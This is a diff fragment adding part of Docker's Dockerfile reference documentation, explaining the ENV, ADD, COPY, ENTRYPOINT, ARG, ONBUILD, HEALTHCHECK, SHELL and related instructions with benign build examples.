+detailed information see the  [overview of this
+feature](https://docs.docker.com/engine/userguide/networking/)).
+
+## ENV
+
+    ENV <key> <value>
+    ENV <key>=<value> ...
+
+The `ENV` instruction sets the environment variable `<key>` to the value
+`<value>`. This value will be in the environment of all "descendant"
+`Dockerfile` commands and can be [replaced inline](#environment-replacement) in
+many as well.
+
+The `ENV` instruction has two forms. The first form, `ENV <key> <value>`,
+will set a single variable to a value. The entire string after the first
+space will be treated as the `<value>` - including characters such as
+spaces and quotes.
+
+The second form, `ENV <key>=<value> ...`, allows for multiple variables to
+be set at one time. Notice that the second form uses the equals sign (=)
+in the syntax, while the first form does not. Like command line parsing,
+quotes and backslashes can be used to include spaces within values.
+
+For example:
+
+    ENV myName="John Doe" myDog=Rex\ The\ Dog \
+        myCat=fluffy
+
+and
+
+    ENV myName John Doe
+    ENV myDog Rex The Dog
+    ENV myCat fluffy
+
+will yield the same net results in the final image, but the first form
+is preferred because it produces a single cache layer.
+
+The environment variables set using `ENV` will persist when a container is run
+from the resulting image. You can view the values using `docker inspect`, and
+change them using `docker run --env <key>=<value>`.
+
+> **Note**:
+> Environment persistence can cause unexpected side effects. For example,
+> setting `ENV DEBIAN_FRONTEND noninteractive` may confuse apt-get
+> users on a Debian-based image. To set a value for a single command, use
+> `RUN <key>=<value> <command>`.
+
+## ADD
+
+ADD has two forms:
+
+- `ADD <src>... <dest>`
+- `ADD ["<src>",... "<dest>"]` (this form is required for paths containing
+whitespace)
+
+The `ADD` instruction copies new files, directories or remote file URLs from `<src>`
+and adds them to the filesystem of the image at the path `<dest>`.
+
+Multiple `<src>` resource may be specified but if they are files or
+directories then they must be relative to the source directory that is
+being built (the context of the build).
+
+Each `<src>` may contain wildcards and matching will be done using Go's
+[filepath.Match](http://golang.org/pkg/path/filepath#Match) rules. For example:
+
+    ADD hom* /mydir/        # adds all files starting with "hom"
+    ADD hom?.txt /mydir/    # ? is replaced with any single character, e.g., "home.txt"
+
+The `<dest>` is an absolute path, or a path relative to `WORKDIR`, into which
+the source will be copied inside the destination container.
+
+    ADD test relativeDir/          # adds "test" to `WORKDIR`/relativeDir/
+    ADD test /absoluteDir/         # adds "test" to /absoluteDir/
+
+All new files and directories are created with a UID and GID of 0.
+
+In the case where `<src>` is a remote file URL, the destination will
+have permissions of 600. If the remote file being retrieved has an HTTP
+`Last-Modified` header, the timestamp from that header will be used
+to set the `mtime` on the destination file. However, like any other file
+processed during an `ADD`, `mtime` will not be included in the determination
+of whether or not the file has changed and the cache should be updated.
+
+> **Note**:
+> If you build by passing a `Dockerfile` through STDIN (`docker
+> build - < somefile`), there is no build context, so the `Dockerfile`
+> can only contain a URL based `ADD` instruction. You can also pass a
+> compressed archive through STDIN: (`docker build - < archive.tar.gz`),
+> the `Dockerfile` at the root of the archive and the rest of the
+> archive will be used as the context of the build.
+
+> **Note**:
+> If your URL files are protected using authentication, you
+> will need to use `RUN wget`, `RUN curl` or use another tool from
+> within the container as the `ADD` instruction does not support
+> authentication.
+
+> **Note**:
+> The first encountered `ADD` instruction will invalidate the cache for all
+> following instructions from the Dockerfile if the contents of `<src>` have
+> changed. This includes invalidating the cache for `RUN` instructions.
+> See the [`Dockerfile` Best Practices
+guide](https://docs.docker.com/engine/userguide/eng-image/dockerfile_best-practices/#/build-cache) for more information.
+
+
+`ADD` obeys the following rules:
+
+- The `<src>` path must be inside the *context* of the build;
+  you cannot `ADD ../something /something`, because the first step of a
+  `docker build` is to send the context directory (and subdirectories) to the
+  docker daemon.
+
+- If `<src>` is a URL and `<dest>` does not end with a trailing slash, then a
+  file is downloaded from the URL and copied to `<dest>`.
+
+- If `<src>` is a URL and `<dest>` does end with a trailing slash, then the
+  filename is inferred from the URL and the file is downloaded to
+  `<dest>/<filename>`. For instance, `ADD http://example.com/foobar /` would
+  create the file `/foobar`. The URL must have a nontrivial path so that an
+  appropriate filename can be discovered in this case (`http://example.com`
+  will not work).
+
+- If `<src>` is a directory, the entire contents of the directory are copied,
+  including filesystem metadata.
+
+> **Note**:
+> The directory itself is not copied, just its contents.
+
+- If `<src>` is a *local* tar archive in a recognized compression format
+  (identity, gzip, bzip2 or xz) then it is unpacked as a directory. Resources
+  from *remote* URLs are **not** decompressed. When a directory is copied or
+  unpacked, it has the same behavior as `tar -x`, the result is the union of:
+
+    1. Whatever existed at the destination path and
+    2. The contents of the source tree, with conflicts resolved in favor
+       of "2." on a file-by-file basis.
+
+  > **Note**:
+  > Whether a file is identified as a recognized compression format or not
+  > is done solely based on the contents of the file, not the name of the file.
+  > For example, if an empty file happens to end with `.tar.gz` this will not
+  > be recognized as a compressed file and **will not** generate any kind of
+  > decompression error message, rather the file will simply be copied to the
+  > destination.
+
+- If `<src>` is any other kind of file, it is copied individually along with
+  its metadata. In this case, if `<dest>` ends with a trailing slash `/`, it
+  will be considered a directory and the contents of `<src>` will be written
+  at `<dest>/base(<src>)`.
+
+- If multiple `<src>` resources are specified, either directly or due to the
+  use of a wildcard, then `<dest>` must be a directory, and it must end with
+  a slash `/`.
+
+- If `<dest>` does not end with a trailing slash, it will be considered a
+  regular file and the contents of `<src>` will be written at `<dest>`.
+
+- If `<dest>` doesn't exist, it is created along with all missing directories
+  in its path.
+
+## COPY
+
+COPY has two forms:
+
+- `COPY <src>... <dest>`
+- `COPY ["<src>",... "<dest>"]` (this form is required for paths containing
+whitespace)
+
+The `COPY` instruction copies new files or directories from `<src>`
+and adds them to the filesystem of the container at the path `<dest>`.
+
+Multiple `<src>` resource may be specified but they must be relative
+to the source directory that is being built (the context of the build).
+
+Each `<src>` may contain wildcards and matching will be done using Go's
+[filepath.Match](http://golang.org/pkg/path/filepath#Match) rules. For example:
+
+    COPY hom* /mydir/        # adds all files starting with "hom"
+    COPY hom?.txt /mydir/    # ? is replaced with any single character, e.g., "home.txt"
+
+The `<dest>` is an absolute path, or a path relative to `WORKDIR`, into which
+the source will be copied inside the destination container.
+
+    COPY test relativeDir/   # adds "test" to `WORKDIR`/relativeDir/
+    COPY test /absoluteDir/  # adds "test" to /absoluteDir/
+
+All new files and directories are created with a UID and GID of 0.
+
+> **Note**:
+> If you build using STDIN (`docker build - < somefile`), there is no
+> build context, so `COPY` can't be used.
+
+`COPY` obeys the following rules:
+
+- The `<src>` path must be inside the *context* of the build;
+  you cannot `COPY ../something /something`, because the first step of a
+  `docker build` is to send the context directory (and subdirectories) to the
+  docker daemon.
+
+- If `<src>` is a directory, the entire contents of the directory are copied,
+  including filesystem metadata.
+
+> **Note**:
+> The directory itself is not copied, just its contents.
+
+- If `<src>` is any other kind of file, it is copied individually along with
+  its metadata. In this case, if `<dest>` ends with a trailing slash `/`, it
+  will be considered a directory and the contents of `<src>` will be written
+  at `<dest>/base(<src>)`.
+
+- If multiple `<src>` resources are specified, either directly or due to the
+  use of a wildcard, then `<dest>` must be a directory, and it must end with
+  a slash `/`.
+
+- If `<dest>` does not end with a trailing slash, it will be considered a
+  regular file and the contents of `<src>` will be written at `<dest>`.
+
+- If `<dest>` doesn't exist, it is created along with all missing directories
+  in its path.
+
+## ENTRYPOINT
+
+ENTRYPOINT has two forms:
+
+- `ENTRYPOINT ["executable", "param1", "param2"]`
+  (*exec* form, preferred)
+- `ENTRYPOINT command param1 param2`
+  (*shell* form)
+
+An `ENTRYPOINT` allows you to configure a container that will run as an executable.
+
+For example, the following will start nginx with its default content, listening
+on port 80:
+
+    docker run -i -t --rm -p 80:80 nginx
+
+Command line arguments to `docker run <image>` will be appended after all
+elements in an *exec* form `ENTRYPOINT`, and will override all elements specified
+using `CMD`.
+This allows arguments to be passed to the entry point, i.e., `docker run <image> -d`
+will pass the `-d` argument to the entry point.
+You can override the `ENTRYPOINT` instruction using the `docker run --entrypoint`
+flag.
+
+The *shell* form prevents any `CMD` or `run` command line arguments from being
+used, but has the disadvantage that your `ENTRYPOINT` will be started as a
+subcommand of `/bin/sh -c`, which does not pass signals.
+This means that the executable will not be the container's `PID 1` - and
+will _not_ receive Unix signals - so your executable will not receive a
+`SIGTERM` from `docker stop <container>`.
+
+Only the last `ENTRYPOINT` instruction in the `Dockerfile` will have an effect.
+
+### Exec form ENTRYPOINT example
+
+You can use the *exec* form of `ENTRYPOINT` to set fairly stable default commands
+and arguments and then use either form of `CMD` to set additional defaults that
+are more likely to be changed.
+
+    FROM ubuntu
+    ENTRYPOINT ["top", "-b"]
+    CMD ["-c"]
+
+When you run the container, you can see that `top` is the only process:
+
+    $ docker run -it --rm --name test  top -H
+    top - 08:25:00 up  7:27,  0 users,  load average: 0.00, 0.01, 0.05
+    Threads:   1 total,   1 running,   0 sleeping,   0 stopped,   0 zombie
+    %Cpu(s):  0.1 us,  0.1 sy,  0.0 ni, 99.7 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
+    KiB Mem:   2056668 total,  1616832 used,   439836 free,    99352 buffers
+    KiB Swap:  1441840 total,        0 used,  1441840 free.  1324440 cached Mem
+
+      PID USER      PR  NI    VIRT    RES    SHR S %CPU %MEM     TIME+ COMMAND
+        1 root      20   0   19744   2336   2080 R  0.0  0.1   0:00.04 top
+
+To examine the result further, you can use `docker exec`:
+
+    $ docker exec -it test ps aux
+    USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
+    root         1  2.6  0.1  19752  2352 ?        Ss+  08:24   0:00 top -b -H
+    root         7  0.0  0.1  15572  2164 ?        R+   08:25   0:00 ps aux
+
+And you can gracefully request `top` to shut down using `docker stop test`.
+
+The following `Dockerfile` shows using the `ENTRYPOINT` to run Apache in the
+foreground (i.e., as `PID 1`):
+
+```
+FROM debian:stable
+RUN apt-get update && apt-get install -y --force-yes apache2
+EXPOSE 80 443
+VOLUME ["/var/www", "/var/log/apache2", "/etc/apache2"]
+ENTRYPOINT ["/usr/sbin/apache2ctl", "-D", "FOREGROUND"]
+```
+
+If you need to write a starter script for a single executable, you can ensure that
+the final executable receives the Unix signals by using `exec` and `gosu`
+commands:
+
+```bash
+#!/bin/bash
+set -e
+
+if [ "$1" = 'postgres' ]; then
+    chown -R postgres "$PGDATA"
+
+    if [ -z "$(ls -A "$PGDATA")" ]; then
+        gosu postgres initdb
+    fi
+
+    exec gosu postgres "$@"
+fi
+
+exec "$@"
+```
+
+Lastly, if you need to do some extra cleanup (or communicate with other containers)
+on shutdown, or are co-ordinating more than one executable, you may need to ensure
+that the `ENTRYPOINT` script receives the Unix signals, passes them on, and then
+does some more work:
+
+```
+#!/bin/sh
+# Note: I've written this using sh so it works in the busybox container too
+
+# USE the trap if you need to also do manual cleanup after the service is stopped,
+#     or need to start multiple services in the one container
+trap "echo TRAPed signal" HUP INT QUIT TERM
+
+# start service in background here
+/usr/sbin/apachectl start
+
+echo "[hit enter key to exit] or run 'docker stop <container>'"
+read
+
+# stop service and clean up here
+echo "stopping apache"
+/usr/sbin/apachectl stop
+
+echo "exited $0"
+```
+
+If you run this image with `docker run -it --rm -p 80:80 --name test apache`,
+you can then examine the container's processes with `docker exec`, or `docker top`,
+and then ask the script to stop Apache:
+
+```bash
+$ docker exec -it test ps aux
+USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
+root         1  0.1  0.0   4448   692 ?        Ss+  00:42   0:00 /bin/sh /run.sh 123 cmd cmd2
+root        19  0.0  0.2  71304  4440 ?        Ss   00:42   0:00 /usr/sbin/apache2 -k start
+www-data    20  0.2  0.2 360468  6004 ?        Sl   00:42   0:00 /usr/sbin/apache2 -k start
+www-data    21  0.2  0.2 360468  6000 ?        Sl   00:42   0:00 /usr/sbin/apache2 -k start
+root        81  0.0  0.1  15572  2140 ?        R+   00:44   0:00 ps aux
+$ docker top test
+PID                 USER                COMMAND
+10035               root                {run.sh} /bin/sh /run.sh 123 cmd cmd2
+10054               root                /usr/sbin/apache2 -k start
+10055               33                  /usr/sbin/apache2 -k start
+10056               33                  /usr/sbin/apache2 -k start
+$ /usr/bin/time docker stop test
+test
+real	0m 0.27s
+user	0m 0.03s
+sys	0m 0.03s
+```
+
+> **Note:** you can override the `ENTRYPOINT` setting using `--entrypoint`,
+> but this can only set the binary to *exec* (no `sh -c` will be used).
+
+> **Note**:
+> The *exec* form is parsed as a JSON array, which means that
+> you must use double-quotes (") around words not single-quotes (').
+
+> **Note**:
+> Unlike the *shell* form, the *exec* form does not invoke a command shell.
+> This means that normal shell processing does not happen. For example,
+> `ENTRYPOINT [ "echo", "$HOME" ]` will not do variable substitution on `$HOME`.
+> If you want shell processing then either use the *shell* form or execute
+> a shell directly, for example: `ENTRYPOINT [ "sh", "-c", "echo $HOME" ]`.
+> When using the exec form and executing a shell directly, as in the case for
+> the shell form, it is the shell that is doing the environment variable
+> expansion, not docker.
+
+### Shell form ENTRYPOINT example
+
+You can specify a plain string for the `ENTRYPOINT` and it will execute in `/bin/sh -c`.
+This form will use shell processing to substitute shell environment variables,
+and will ignore any `CMD` or `docker run` command line arguments.
+To ensure that `docker stop` will signal any long running `ENTRYPOINT` executable
+correctly, you need to remember to start it with `exec`:
+
+    FROM ubuntu
+    ENTRYPOINT exec top -b
+
+When you run this image, you'll see the single `PID 1` process:
+
+    $ docker run -it --rm --name test top
+    Mem: 1704520K used, 352148K free, 0K shrd, 0K buff, 140368121167873K cached
+    CPU:   5% usr   0% sys   0% nic  94% idle   0% io   0% irq   0% sirq
+    Load average: 0.08 0.03 0.05 2/98 6
+      PID  PPID USER     STAT   VSZ %VSZ %CPU COMMAND
+        1     0 root     R     3164   0%   0% top -b
+
+Which will exit cleanly on `docker stop`:
+
+    $ /usr/bin/time docker stop test
+    test
+    real	0m 0.20s
+    user	0m 0.02s
+    sys	0m 0.04s
+
+If you forget to add `exec` to the beginning of your `ENTRYPOINT`:
+
+    FROM ubuntu
+    ENTRYPOINT top -b
+    CMD --ignored-param1
+
+You can then run it (giving it a name for the next step):
+
+    $ docker run -it --name test top --ignored-param2
+    Mem: 1704184K used, 352484K free, 0K shrd, 0K buff, 140621524238337K cached
+    CPU:   9% usr   2% sys   0% nic  88% idle   0% io   0% irq   0% sirq
+    Load average: 0.01 0.02 0.05 2/101 7
+      PID  PPID USER     STAT   VSZ %VSZ %CPU COMMAND
+        1     0 root     S     3168   0%   0% /bin/sh -c top -b cmd cmd2
+        7     1 root     R     3164   0%   0% top -b
+
+You can see from the output of `top` that the specified `ENTRYPOINT` is not `PID 1`.
+
+If you then run `docker stop test`, the container will not exit cleanly - the
+`stop` command will be forced to send a `SIGKILL` after the timeout:
+
+    $ docker exec -it test ps aux
+    PID   USER     COMMAND
+        1 root     /bin/sh -c top -b cmd cmd2
+        7 root     top -b
+        8 root     ps aux
+    $ /usr/bin/time docker stop test
+    test
+    real	0m 10.19s
+    user	0m 0.04s
+    sys	0m 0.03s
+
+### Understand how CMD and ENTRYPOINT interact
+
+Both `CMD` and `ENTRYPOINT` instructions define what command gets executed when running a container.
+There are few rules that describe their co-operation.
+
+1. Dockerfile should specify at least one of `CMD` or `ENTRYPOINT` commands.
+
+2. `ENTRYPOINT` should be defined when using the container as an executable.
+
+3. `CMD` should be used as a way of defining default arguments for an `ENTRYPOINT` command
+or for executing an ad-hoc command in a container.
+
+4. `CMD` will be overridden when running the container with alternative arguments.
+
+The table below shows what command is executed for different `ENTRYPOINT` / `CMD` combinations:
+
+|                                | No ENTRYPOINT              | ENTRYPOINT exec_entry p1_entry | ENTRYPOINT ["exec_entry", "p1_entry"]          |
+|--------------------------------|----------------------------|--------------------------------|------------------------------------------------|
+| **No CMD**                     | *error, not allowed*       | /bin/sh -c exec_entry p1_entry | exec_entry p1_entry                            |
+| **CMD ["exec_cmd", "p1_cmd"]** | exec_cmd p1_cmd            | /bin/sh -c exec_entry p1_entry | exec_entry p1_entry exec_cmd p1_cmd            |
+| **CMD ["p1_cmd", "p2_cmd"]**   | p1_cmd p2_cmd              | /bin/sh -c exec_entry p1_entry | exec_entry p1_entry p1_cmd p2_cmd              |
+| **CMD exec_cmd p1_cmd**        | /bin/sh -c exec_cmd p1_cmd | /bin/sh -c exec_entry p1_entry | exec_entry p1_entry /bin/sh -c exec_cmd p1_cmd |
+
+## VOLUME
+
+    VOLUME ["/data"]
+
+The `VOLUME` instruction creates a mount point with the specified name
+and marks it as holding externally mounted volumes from native host or other
+containers. The value can be a JSON array, `VOLUME ["/var/log/"]`, or a plain
+string with multiple arguments, such as `VOLUME /var/log` or `VOLUME /var/log
+/var/db`. For more information/examples and mounting instructions via the
+Docker client, refer to
+[*Share Directories via Volumes*](https://docs.docker.com/engine/tutorials/dockervolumes/#/mount-a-host-directory-as-a-data-volume)
+documentation.
+
+The `docker run` command initializes the newly created volume with any data
+that exists at the specified location within the base image. For example,
+consider the following Dockerfile snippet:
+
+    FROM ubuntu
+    RUN mkdir /myvol
+    RUN echo "hello world" > /myvol/greeting
+    VOLUME /myvol
+
+This Dockerfile results in an image that causes `docker run`, to
+create a new mount point at `/myvol` and copy the  `greeting` file
+into the newly created volume.
+
+> **Note**:
+> If any build steps change the data within the volume after it has been
+> declared, those changes will be discarded.
+
+> **Note**:
+> The list is parsed as a JSON array, which means that
+> you must use double-quotes (") around words not single-quotes (').
+
+## USER
+
+    USER daemon
+
+The `USER` instruction sets the user name or UID to use when running the image
+and for any `RUN`, `CMD` and `ENTRYPOINT` instructions that follow it in the
+`Dockerfile`.
+
+## WORKDIR
+
+    WORKDIR /path/to/workdir
+
+The `WORKDIR` instruction sets the working directory for any `RUN`, `CMD`,
+`ENTRYPOINT`, `COPY` and `ADD` instructions that follow it in the `Dockerfile`.
+If the `WORKDIR` doesn't exist, it will be created even if it's not used in any
+subsequent `Dockerfile` instruction.
+
+It can be used multiple times in the one `Dockerfile`. If a relative path
+is provided, it will be relative to the path of the previous `WORKDIR`
+instruction. For example:
+
+    WORKDIR /a
+    WORKDIR b
+    WORKDIR c
+    RUN pwd
+
+The output of the final `pwd` command in this `Dockerfile` would be
+`/a/b/c`.
+
+The `WORKDIR` instruction can resolve environment variables previously set using
+`ENV`. You can only use environment variables explicitly set in the `Dockerfile`.
+For example:
+
+    ENV DIRPATH /path
+    WORKDIR $DIRPATH/$DIRNAME
+    RUN pwd
+
+The output of the final `pwd` command in this `Dockerfile` would be
+`/path/$DIRNAME`
+
+## ARG
+
+    ARG <name>[=<default value>]
+
+The `ARG` instruction defines a variable that users can pass at build-time to
+the builder with the `docker build` command using the `--build-arg <varname>=<value>`
+flag. If a user specifies a build argument that was not
+defined in the Dockerfile, the build outputs a warning.
+
+```
+[Warning] One or more build-args [foo] were not consumed.
+```
+
+The Dockerfile author can define a single variable by specifying `ARG` once or many
+variables by specifying `ARG` more than once. For example, a valid Dockerfile:
+
+```
+FROM busybox
+ARG user1
+ARG buildno
+...
+```
+
+A Dockerfile author may optionally specify a default value for an `ARG` instruction:
+
+```
+FROM busybox
+ARG user1=someuser
+ARG buildno=1
+...
+```
+
+If an `ARG` value has a default and if there is no value passed at build-time, the
+builder uses the default.
+
+An `ARG` variable definition comes into effect from the line on which it is
+defined in the `Dockerfile` not from the argument's use on the command-line or
+elsewhere.  For example, consider this Dockerfile:
+
+```
+1 FROM busybox
+2 USER ${user:-some_user}
+3 ARG user
+4 USER $user
+...
+```
+A user builds this file by calling:
+
+```
+$ docker build --build-arg user=what_user Dockerfile
+```
+
+The `USER` at line 2 evaluates to `some_user` as the `user` variable is defined on the
+subsequent line 3. The `USER` at line 4 evaluates to `what_user` as `user` is
+defined and the `what_user` value was passed on the command line. Prior to its definition by an
+`ARG` instruction, any use of a variable results in an empty string.
+
+> **Warning:** It is not recommended to use build-time variables for
+>  passing secrets like github keys, user credentials etc. Build-time variable
+>  values are visible to any user of the image with the `docker history` command.
+
+You can use an `ARG` or an `ENV` instruction to specify variables that are
+available to the `RUN` instruction. Environment variables defined using the
+`ENV` instruction always override an `ARG` instruction of the same name. Consider
+this Dockerfile with an `ENV` and `ARG` instruction.
+
+```
+1 FROM ubuntu
+2 ARG CONT_IMG_VER
+3 ENV CONT_IMG_VER v1.0.0
+4 RUN echo $CONT_IMG_VER
+```
+Then, assume this image is built with this command:
+
+```
+$ docker build --build-arg CONT_IMG_VER=v2.0.1 Dockerfile
+```
+
+In this case, the `RUN` instruction uses `v1.0.0` instead of the `ARG` setting
+passed by the user:`v2.0.1` This behavior is similar to a shell
+script where a locally scoped variable overrides the variables passed as
+arguments or inherited from environment, from its point of definition.
+
+Using the example above but a different `ENV` specification you can create more
+useful interactions between `ARG` and `ENV` instructions:
+
+```
+1 FROM ubuntu
+2 ARG CONT_IMG_VER
+3 ENV CONT_IMG_VER ${CONT_IMG_VER:-v1.0.0}
+4 RUN echo $CONT_IMG_VER
+```
+
+Unlike an `ARG` instruction, `ENV` values are always persisted in the built
+image. Consider a docker build without the `--build-arg` flag:
+
+```
+$ docker build Dockerfile
+```
+
+Using this Dockerfile example, `CONT_IMG_VER` is still persisted in the image but
+its value would be `v1.0.0` as it is the default set in line 3 by the `ENV` instruction.
+
+The variable expansion technique in this example allows you to pass arguments
+from the command line and persist them in the final image by leveraging the
+`ENV` instruction. Variable expansion is only supported for [a limited set of
+Dockerfile instructions.](#environment-replacement)
+
+Docker has a set of predefined `ARG` variables that you can use without a
+corresponding `ARG` instruction in the Dockerfile.
+
+* `HTTP_PROXY`
+* `http_proxy`
+* `HTTPS_PROXY`
+* `https_proxy`
+* `FTP_PROXY`
+* `ftp_proxy`
+* `NO_PROXY`
+* `no_proxy`
+
+To use these, simply pass them on the command line using the flag:
+
+```
+--build-arg <varname>=<value>
+```
+
+### Impact on build caching
+
+`ARG` variables are not persisted into the built image as `ENV` variables are.
+However, `ARG` variables do impact the build cache in similar ways. If a
+Dockerfile defines an `ARG` variable whose value is different from a previous
+build, then a "cache miss" occurs upon its first usage, not its definition. In
+particular, all `RUN` instructions following an `ARG` instruction use the `ARG`
+variable implicitly (as an environment variable), thus can cause a cache miss.
+
+For example, consider these two Dockerfile:
+
+```
+1 FROM ubuntu
+2 ARG CONT_IMG_VER
+3 RUN echo $CONT_IMG_VER
+```
+
+```
+1 FROM ubuntu
+2 ARG CONT_IMG_VER
+3 RUN echo hello
+```
+
+If you specify `--build-arg CONT_IMG_VER=<value>` on the command line, in both
+cases, the specification on line 2 does not cause a cache miss; line 3 does
+cause a cache miss.`ARG CONT_IMG_VER` causes the RUN line to be identified
+as the same as running `CONT_IMG_VER=<value>` echo hello, so if the `<value>`
+changes, we get a cache miss.
+
+Consider another example under the same command line:
+
+```
+1 FROM ubuntu
+2 ARG CONT_IMG_VER
+3 ENV CONT_IMG_VER $CONT_IMG_VER
+4 RUN echo $CONT_IMG_VER
+```
+In this example, the cache miss occurs on line 3. The miss happens because
+the variable's value in the `ENV` references the `ARG` variable and that
+variable is changed through the command line. In this example, the `ENV`
+command causes the image to include the value.
+
+If an `ENV` instruction overrides an `ARG` instruction of the same name, like
+this Dockerfile:
+
+```
+1 FROM ubuntu
+2 ARG CONT_IMG_VER
+3 ENV CONT_IMG_VER hello
+4 RUN echo $CONT_IMG_VER
+```
+
+Line 3 does not cause a cache miss because the value of `CONT_IMG_VER` is a
+constant (`hello`). As a result, the environment variables and values used on
+the `RUN` (line 4) doesn't change between builds.
+
+## ONBUILD
+
+    ONBUILD [INSTRUCTION]
+
+The `ONBUILD` instruction adds to the image a *trigger* instruction to
+be executed at a later time, when the image is used as the base for
+another build. The trigger will be executed in the context of the
+downstream build, as if it had been inserted immediately after the
+`FROM` instruction in the downstream `Dockerfile`.
+
+Any build instruction can be registered as a trigger.
+
+This is useful if you are building an image which will be used as a base
+to build other images, for example an application build environment or a
+daemon which may be customized with user-specific configuration.
+
+For example, if your image is a reusable Python application builder, it
+will require application source code to be added in a particular
+directory, and it might require a build script to be called *after*
+that. You can't just call `ADD` and `RUN` now, because you don't yet
+have access to the application source code, and it will be different for
+each application build. You could simply provide application developers
+with a boilerplate `Dockerfile` to copy-paste into their application, but
+that is inefficient, error-prone and difficult to update because it
+mixes with application-specific code.
+
+The solution is to use `ONBUILD` to register advance instructions to
+run later, during the next build stage.
+
+Here's how it works:
+
+1. When it encounters an `ONBUILD` instruction, the builder adds a
+   trigger to the metadata of the image being built. The instruction
+   does not otherwise affect the current build.
+2. At the end of the build, a list of all triggers is stored in the
+   image manifest, under the key `OnBuild`. They can be inspected with
+   the `docker inspect` command.
+3. Later the image may be used as a base for a new build, using the
+   `FROM` instruction. As part of processing the `FROM` instruction,
+   the downstream builder looks for `ONBUILD` triggers, and executes
+   them in the same order they were registered. If any of the triggers
+   fail, the `FROM` instruction is aborted which in turn causes the
+   build to fail. If all triggers succeed, the `FROM` instruction
+   completes and the build continues as usual.
+4. Triggers are cleared from the final image after being executed. In
+   other words they are not inherited by "grand-children" builds.
+
+For example you might add something like this:
+
+    [...]
+    ONBUILD ADD . /app/src
+    ONBUILD RUN /usr/local/bin/python-build --dir /app/src
+    [...]
+
+> **Warning**: Chaining `ONBUILD` instructions using `ONBUILD ONBUILD` isn't allowed.
+
+> **Warning**: The `ONBUILD` instruction may not trigger `FROM` or `MAINTAINER` instructions.
+
+## STOPSIGNAL
+
+    STOPSIGNAL signal
+
+The `STOPSIGNAL` instruction sets the system call signal that will be sent to the container to exit.
+This signal can be a valid unsigned number that matches a position in the kernel's syscall table, for instance 9,
+or a signal name in the format SIGNAME, for instance SIGKILL.
+
+## HEALTHCHECK
+
+The `HEALTHCHECK` instruction has two forms:
+
+* `HEALTHCHECK [OPTIONS] CMD command` (check container health by running a command inside the container)
+* `HEALTHCHECK NONE` (disable any healthcheck inherited from the base image)
+
+The `HEALTHCHECK` instruction tells Docker how to test a container to check that
+it is still working. This can detect cases such as a web server that is stuck in
+an infinite loop and unable to handle new connections, even though the server
+process is still running.
+
+When a container has a healthcheck specified, it has a _health status_ in
+addition to its normal status. This status is initially `starting`. Whenever a
+health check passes, it becomes `healthy` (whatever state it was previously in).
+After a certain number of consecutive failures, it becomes `unhealthy`.
+
+The options that can appear before `CMD` are:
+
+* `--interval=DURATION` (default: `30s`)
+* `--timeout=DURATION` (default: `30s`)
+* `--retries=N` (default: `3`)
+
+The health check will first run **interval** seconds after the container is
+started, and then again **interval** seconds after each previous check completes.
+
+If a single run of the check takes longer than **timeout** seconds then the check
+is considered to have failed.
+
+It takes **retries** consecutive failures of the health check for the container
+to be considered `unhealthy`.
+
+There can only be one `HEALTHCHECK` instruction in a Dockerfile. If you list
+more than one then only the last `HEALTHCHECK` will take effect.
+
+The command after the `CMD` keyword can be either a shell command (e.g. `HEALTHCHECK
+CMD /bin/check-running`) or an _exec_ array (as with other Dockerfile commands;
+see e.g. `ENTRYPOINT` for details).
+
+The command's exit status indicates the health status of the container.
+The possible values are:
+
+- 0: success - the container is healthy and ready for use
+- 1: unhealthy - the container is not working correctly
+- 2: reserved - do not use this exit code
+
+For example, to check every five minutes or so that a web-server is able to
+serve the site's main page within three seconds:
+
+    HEALTHCHECK --interval=5m --timeout=3s \
+      CMD curl -f http://localhost/ || exit 1
+
+To help debug failing probes, any output text (UTF-8 encoded) that the command writes
+on stdout or stderr will be stored in the health status and can be queried with
+`docker inspect`. Such output should be kept short (only the first 4096 bytes
+are stored currently).
+
+When the health status of a container changes, a `health_status` event is
+generated with the new status.
+
+The `HEALTHCHECK` feature was added in Docker 1.12.
+
+
+## SHELL
+
+    SHELL ["executable", "parameters"]
+
+The `SHELL` instruction allows the default shell used for the *shell* form of
+commands to be overridden. The default shell on Linux is `["/bin/sh", "-c"]`, and on
+Windows is `["cmd", "/S", "/C"]`. The `SHELL` instruction *must* be written in JSON
+form in a Dockerfile.
+
+The `SHELL` instruction is particularly useful on Windows where there are
+two commonly used and quite different native shells: `cmd` and `powershell`, as
+well as alternate shells available including `sh`.
+
+The `SHELL` instruction can appear multiple times. Each `SHELL` instruction overrides
+all previous `SHELL` instructions, and affects all subsequent instructions. For example:
+
+    FROM microsoft/windowsservercore
+
+    # Executed as cmd /S /C echo default
+    RUN echo default
+
+    # Executed as cmd /S /C powershell -command Write-Host default
+    RUN powershell -command Write-Host default
+
+    # Executed as powershell -command Write-Host hello
+    SHELL ["powershell", "-command"]
+    RUN Write-Host hello
+
+    # Executed as cmd /S /C echo hello
+    SHELL ["cmd", "/S"", "/C"]
+    RUN echo hello
+
+The following instructions can be affected by the `SHELL` instruction when the
+*shell* form of them is used in a Dockerfile: `RUN`, `CMD` and `ENTRYPOINT`.
+
+The following example is a common pattern found on Windows which can be
+streamlined by using the `SHELL` instruction:
+
+    ...
+    RUN powershell -command Execute-MyCmdlet -param1 "c:\foo.txt"
+    ...
+
+The command invoked by docker will be:
+
+    cmd /S /C powershell -command Execute-MyCmdlet -param1 "c:\foo.txt"
+
+This is inefficient for two reasons. First, there is an un-necessary cmd.exe command
+processor (aka shell) being invoked. Second, each `RUN` instruction in the *shell*
+form requires an extra `powershell -command` prefixing the command.
+
+To make this more efficient, one of two mechanisms can be employed. One is to
+use the JSON form of the RUN command such as:
+
+    ...
+    RUN ["powershell", "-command", "Execute-MyCmdlet", "-param1 \"c:\\foo.txt\""]
+    ...
+
+While the JSON form is unambiguous and does not use the un-necessary cmd.exe,
+it does require more verbosity through double-quoting and escaping. The alternate
+mechanism is to use the `SHELL` instruction and the *shell* form,
+making a more natural syntax for Windows users, especially when combined with
+the `escape` parser directive:
+
+    # escape=`
+
+    FROM microsoft/nanoserver
+    SHELL ["powershell","-command"]
+    RUN New-Item -ItemType Directory C:\Example
+    ADD Execute-MyCmdlet.ps1 c:\example\
+    RUN c:\example\Execute-MyCmdlet -sample 'hello world'
+
+Resulting in:
+
+    PS E:\docker\build\shell> docker build -t shell .
+    Sending build context to Docker daemon 4.096 kB
+    Step 1/5 : FROM microsoft/nanoserver
+     ---> 22738ff49c6d
+    Step 2/5 : SHELL powershell -command
+     ---> Running in 6fcdb6855ae2
